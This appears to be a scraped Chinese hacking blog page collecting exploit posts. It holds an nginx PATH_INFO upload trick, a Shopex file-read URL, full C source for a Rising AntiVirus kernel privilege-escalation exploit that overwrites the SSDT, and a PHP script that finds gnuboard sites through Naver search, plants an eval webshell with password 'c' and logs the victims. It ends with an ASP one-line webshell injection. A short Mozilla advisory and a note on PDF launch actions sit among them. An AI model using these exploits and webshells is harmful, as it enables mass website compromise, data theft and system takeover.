Chinadu`s Blog

来源：Chinadu`s Blog

http://www.4shell.org/archives/1777.html

其实这个算不上是漏洞也谈不上0day，只能说是一个windows fun罢了。

测试如下：

1.选择任意一个exe文件，鼠标右键选择重命名：

阅读全文...

PS:其实10年前就爆出了这个漏洞，如今流传开了，估计能引起一场小小的革命，不少大站的源码都要流传出来了。
PHP PATH_INFO 存在漏洞

使用nginx+php组建的网站只要允许上传图片就可能被黑客入侵，直到5.21日凌晨，nginx尚未发布修复该漏洞的补丁；已经有一些网站被黑了，管理员速修复！

测试方法：

Nginx的服务器上传图片访问图片地址，后面加上4shell.php

例如：www.xx.com/upload/201005219527.jpg/4shell.php

临时修补方法,可3选其一
阅读全文...

影响版本： Shopex V4.8.4 V4.8.5
漏洞描述： 文件过滤不严，导致任意文件读取漏洞。
测试代码：

http://www.target.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

可以连上数据库.
阅读全文...

There's a function within PDF specs to launch executables. Or to run JavaScript. Why do we need these things?

With specs like these, it's no wonder it takes ages for Adobe Reader to boot up and load all the plugins.

It's no wonder there are regular security problems with PDF readers in general.

The perfect example is the "Escape from PDF" demo from Didier Stevens' blog.

Users of Foxit Reader: try opening Didier's demo PDF file. After opening, it will run CMD.EXE on your system; no questions asked. And this is a legitimate PDF file which uses no exploits.

One way to reduce your risk is not to download PDF files from the web to your machine at all. Instead of opening the files on your local machine, you can open them remotely in viewers like Google Docs. This process can be made completely automatic with plugins like gPDF (for Chrome/Opera/Firefox/Iron). Do note that it will only work with PDF files you access in the public web.

Otherwise, our guidance would be to use a PDF reader that's as unpopular as possible. The less users a product has, the less attacks it will attract.

PS:下载demo PDF file运行后会弹出CMD.exe 建议各位使用chrome+Docs PDF/PowerPoint Viewer

Update on Secunia Advisory SA38608

Mozilla was contacted by Evgeny Legerov, the security researcher who discovered the bug referenced in the Secunia report, with sufficient details to reproduce and analyze the issue.  The vulnerability was determined to be critical and could result in remote code execution by an attacker.  The vulnerability has been patched by developers and we are currently undergoing quality assurance testing for the fix.  Firefox 3.6.2 is scheduled to be released March 30th and will contain the fix for this issue.  As always, we encourage users to apply this update as soon as it is available to ensure a safe browsing experience.  Alternatively, users can download Release Candidate builds of Firefox 3.6.2 which contains the fix from here:  https://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/3.6.2-candidates/build3/

Update: To clarify, as originally claimed this issue affects Firefox 3.6 only and not any earlier versions. Thunderbird and SeaMonkey are based on earlier versions of the browser engine and are not affected. People testing “3.7″ development builds should upgrade to 3.7 alpha 3 or the latest nightly build to ensure they have this fix.

官方暂时没出补丁,不过我估计快了
执行成功会在在data/cache下生成t.php一句话小马
密码t,官方最新GBK和utf-8版本存在此漏洞,
此exp得特点是生产t.php得时候不留日志

阅读全文...

编译后,运行此程序,可在ring3下直接恢复其ssdt,然后就可以为所欲为了,刚才测试1月28日对瑞星2010版有效,据说也适用于2009和 2008版本

//MY Blog:http://hi.baidu.com/9908006

//MY QQ:165659238

//VC-ConsoleWithApi

#include "stdafx.h"

#include "windows.h"

enum { SystemModuleInformation = 11 };

typedef struct {

ULONG Unknown1;

ULONG Unknown2;

PVOID Base;

ULONG Size;

ULONG Flags;

USHORT Index;

USHORT NameLength;

USHORT LoadCount;

USHORT PathLength;

CHAR ImageName[256];

} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct {

ULONG Count;

SYSTEM_MODULE_INFORMATION_ENTRY Module[1];

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

HANDLE g_RsGdiHandle = 0 ;

void __stdcall WriteKVM(PVOID Address , ULONG Value)

{

ULONG ColorValue = Value ;

ULONG btr ;

ULONG ColorBuffer = 0 ;

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

&ColorBuffer ,

sizeof(ULONG),

&btr ,

0

);

DeviceIoControl(g_RsGdiHandle ,

0x83003C0B,

&ColorValue ,

sizeof(ULONG),

Address ,

sizeof(ULONG),

&btr ,

0

);

return ;

}

void AddCallGate()

{

ULONG Gdt_Addr;

ULONG CallGateData[0x4];

ULONG Icount;

__asm

{

push edx

sgdt [esp-2]

pop edx

mov Gdt_Addr , edx

}

__asm

{

push 0xc3

push Gdt_Addr

call WriteKVM

mov eax,Gdt_Addr

mov word ptr[CallGateData],ax

shr eax,16

mov word ptr[CallGateData+6],ax

mov dword ptr[CallGateData+2],0x0ec0003e8

mov dword ptr[CallGateData+8],0x0000ffff

mov dword ptr[CallGateData+12],0x00cf9a00

xor eax,eax

LoopWrite:

mov edi,dword ptr CallGateData[eax]

push edi

mov edi,Gdt_Addr

add edi,0x3e0

add edi,eax

push edi

mov Icount,eax

call WriteKVM

mov eax,Icount

add eax , 0x4

cmp eax,0x10

jnz LoopWrite

}

return ;

}

void IntoR0(PVOID function)

{

WORD Callgt[3];

Callgt[0] = 0;

Callgt[1] = 0;

Callgt[2] = 0x3e3;

__asm

{

call fword ptr[Callgt]

mov eax,esp

mov esp,[esp+4]

push eax

call function

pop esp

push offset ring3Ret

retf

ring3Ret:

nop

}

return ;

}

#pragma pack(1)

typedef struct _IDTR

{

SHORT IDTLimit;

UINT IDTBase;

}IDTR,

*PIDTR,

**PPIDTR;

#pragma pack()

ULONG g_RealSSDT = 0 ;

ULONG ServiceNum = 0 ;

ULONG OrgService [0x1000] ;

ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)

{

ULONG Offset = Rva, Limit;

IMAGE_SECTION_HEADER *Img;

WORD i;

Img = IMAGE_FIRST_SECTION(NT);

if (Rva < Img->PointerToRawData)

return Rva;

for (i = 0; i < NT->FileHeader.NumberOfSections; i++)

{

if (Img.SizeOfRawData)

Limit = Img.SizeOfRawData;

else

Limit = Img.Misc.VirtualSize;

if (Rva >= Img.VirtualAddress &&

Rva < (Img.VirtualAddress + Limit))

{

if (Img.PointerToRawData != 0)

{

Offset -= Img.VirtualAddress;

Offset += Img.PointerToRawData;

}

return Offset;

}

}

return 0;

}

#define ibaseDD *(PDWORD)&ibase

DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)

{

PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase;

if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];

if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) return FALSE;

*pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));

*poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));

if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;

*psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));

return TRUE;

}

typedef struct {

WORD offset:12;

WORD type:4;

} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))

DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)

{

PIMAGE_FILE_HEADER pfh;

PIMAGE_OPTIONAL_HEADER poh;

PIMAGE_SECTION_HEADER psh;

PIMAGE_BASE_RELOCATION pbr;

PIMAGE_FIXUP_ENTRY pfe;

DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;

BOOL bFirstChunk;

GetHeaders((PCHAR)hModule,&pfh,&poh,&psh);

if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&

(!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {

pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);

bFirstChunk=TRUE;

while (bFirstChunk || pbr->VirtualAddress) {

bFirstChunk=FALSE;

pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {

if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {

dwFixups++;

dwPointerRva=pbr->VirtualAddress+pfe->offset;

dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

if (dwPointsToRva==dwKSDT)

{

if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)

{

dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;

*ImageBase = poh->ImageBase;

return dwKiServiceTable;

}

}

}

}

*(PDWORD)&pbr+=pbr->SizeOfBlock;

}

}

return 0;

}

DWORD CR0Reg ;

ULONG realssdt ;

void InKerneProc()

{

__asm

{

cli

mov eax, cr0

mov CR0Reg,eax

and eax,0xFFFEFFFF

mov cr0, eax

}

int i;

for (i = 0; i < (int)ServiceNum; i++)

{

*(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService;

}

__asm

{

mov eax, CR0Reg

mov cr0, eax

sti

}

}

int main(int argc, char* argv[])

{

printf("Rising AntiVirus 2008 ~ 2010 n"

"Local Privilege Escalation Vulnerability Proof Of Concept Exploitn 2010-1-27n");

g_RsGdiHandle = CreateFile("[url=]\\.\RSNTGDI[/url]" ,

0,

FILE_SHARE_READ | FILE_SHARE_WRITE ,

0,

OPEN_EXISTING , 0 , 0 );

if (g_RsGdiHandle == INVALID_HANDLE_VALUE)

{

return 0 ;

}

SYSTEM_MODULE_INFORMATION ModuleInfo ;

// Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it's base address

HMODULE hlib = GetModuleHandle("ntdll.dll");

PVOID pNtQuerySystemInformation = GetProcAddress(hlib , "NtQuerySystemInformation");

ULONG infosize = sizeof(ModuleInfo);

__asm

{

push 0

push infosize

lea eax , ModuleInfo

push eax

push 11

call pNtQuerySystemInformation

}

HMODULE KernelHandle ;

LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

// Load the kernel image specified

KernelHandle = LoadLibrary(ntosname);

if (KernelHandle == 0 )

{

return 0 ;

}

ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , "KeServiceDescriptorTable");

if (KeSSDT == 0 )

{

return 0 ;

}

ULONG ImageBase = 0 ;

ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT - (ULONG)KernelHandle , &ImageBase);

if (KiSSDT == 0 )

{

return 0 ;

}

KiSSDT += (ULONG)KernelHandle;

ServiceNum = 0x11c ;

ULONG i ;

for (i = 0 ; i < ServiceNum ; i ++)

{

OrgService = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base - ImageBase;

}

realssdt = KeSSDT - (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;

SetThreadAffinityMask(GetCurrentThread () , 0 ) ;

AddCallGate();

IntoR0(InKerneProc);

return 0;

}

谷歌，Adobe和其他大公司有针对性的攻击的消息上周已经被披露，最初安全人员们预计是采用恶意的PDF文件进行攻击，但在上周四，微软承认攻击是由一个Internet Explorer中新的安全漏洞引发。
目前已经检测到针对此漏洞的攻击代码正在蔓延，相应的恶意代码页面也已经出现，安全研究机构WebSense今日发出安全警告，以下是技术分析截图：

阅读全文...

利用代码如下：

< ?php
echo" +----------------------------------------------------------------+\r\n";
echo" http://www.t00ls.net\r\n";
echo" +----------------------------------------------------------------+\r\n";
for ($ii=1;$ii<=99;$ii++)
{
$c=(int)$ii*10+1;
$a="web.search.naver.com";
$b="/search.naver?where=webkr&query=bbs/board.php&xc=&docid=0&lang=all&st=s&fd=2&start=".$c."&display=10&&qvt=0&sm=tab_pge";
get($a,$b);

}

function get($host,$file)
{

$fp = fsockopen($host, 80, $errno, $errstr, 10);
if (!$fp) {
echo "SocketError: $errstr ($errno)\n";
return false;
}
$get = "GET $file HTTP/1.1\r\n";
$get .= "Host: $host\r\n";
$get .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\r\n";
$get .= "Referer: http://$host\r\n";
$get .= "Connection: Close\r\n";
$get .= "Cookie: nsr_acl_nautocomplete=1; NB=GIYTSNJYHE4DKMJX; NNB=AIUHYPM7OXJUS; page_uid=fOL9uloi5UNssbPX/M8sss--100532; _naver_usersession_=SdN7qBY700kAAAKIwME\r\n\r\n";
fwrite($fp, $get);
$response=stream_get_contents($fp);
preg_match_all("(http://[-\w.]+(:\d+)?(/([\w/_.]*)?)?bbs\/board\.php)",$response,$put);
for ($i=0;$i {
$a=(int)$i*3;

fuck($put[0][$a]);
//echo count($put[0]);
//print_r($put[0]);
//fuck($put[0][$i]);

break;

}

fclose($fp);

}

function fuck($ok)
{

$a=preg_replace('(bbs\/board.php)','',$ok);

$file=$a."common.php?g4_path=/tmp%002345";
$xxx=$a."common.php?g4_path=data:;base64,PD9mcHV0cyhmb3BlbignLi9kYXRhL29rLnBocCcsJ3crJyksJzw/cGhwIEBldmFsKCRfUE9TVFtjXSk7ZWNobyAiZnVja3lvdSI7Pz4nKTs/Pg==";
$shell=$a."data/ok.php";
$target=parse_url($ok);
$sitepath=$target['host'];
$xx=@file_get_contents($file);
if(eregi("(Warning)",$xx)&&eregi("(tmp)",$xx))
{
print $sitepath." Vulnerability yes"."\r\n";
@file_get_contents($xxx);
$oksehll=@file_get_contents($shell);
if(!eregi("(\\02345)",$xx))
{
print $sitepath." %00 ok"."\r\n";
}

if (eregi("(fuckyou)",$oksehll))
{

print $shell." pass:c"."\r\n";
$axx="\r\n".$shell;
$sh=fopen('gnuboard.txt',"a+");
fwrite($sh,$axx);
fclose($sh);

}

}
else
{

print $sitepath." Vulnerability no"."\r\n";

}

}

?>

在密码问题的地方插入加密后的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾
注册成功后连接默认数据库:ask/data/ask_newasp.asa 密码:a